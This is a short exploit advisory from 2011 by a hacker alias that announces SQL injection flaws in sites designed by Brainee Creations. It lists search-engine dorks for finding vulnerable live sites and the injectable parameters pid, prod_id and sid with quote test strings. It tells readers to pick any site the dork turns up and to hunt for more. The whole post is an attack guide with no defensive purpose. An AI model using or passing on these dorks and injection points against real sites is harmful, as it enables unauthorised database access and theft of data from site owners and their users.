Brainee Creations suffers from multiple remote SQL injection vulnerabilities.
4da810ad44fe1ce0c8242e7df6953ac70faf14fb5c9c1ea7d1828674e8aca056
#(+)Exploit Title: Brainee Creations Database Access vulnerability
#(+)Author : ^Xecuti0n3r
#(+) Date : 15.04.2011
#(+) Hour : 13:37 PM
#(+) E-mail : xecuti0n3r()yahoo.com
#(+) dork1 : intext:"Site Designed by Brainee Creations" inurl:product.php?
#(+) dork2 : intext:"Site Designed by Brainee Creations" inurl:page.php?
#(+) Category : Web Apps [SQli]
____________________________________________________________________
____________________________________________________________________
Choose any site that comes up when you enter the dork intext:"Site Designed by Brainee Creations" inurl:product.php? in search engine
*SQL injection Vulnerability*
For DOrk1 :
# [+]http://site.com/product.php?pid='08
# [+]http://site.com/product.php?pid=[SQLi]
# [+]http://site.com/product.php?prod_id='13
# [+]http://site.com/product.php?prod_id=[SQLi]
# [+]http://site.com/product.php?pid='82
# [+]http://site.com/product.php?pid=[SQLi]
For Dork2 :
# [+]http://site.com/page.php?pid='2
# [+]http://site.com/page.php?pid=[SQLi]
# [+]http://site.com/page.php?sid='1&pid='6
# [+]http://site.com/page.php?sid=[SQLi]&pid=[SQLi]
Well there are a lot more .. just use the dork filetype:php ;) ..
____________________________________________________________________
____________________________________________________________________
########################################################################
(+)Exploit Coded by: ^Xecuti0n3r
(+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r
########################################################################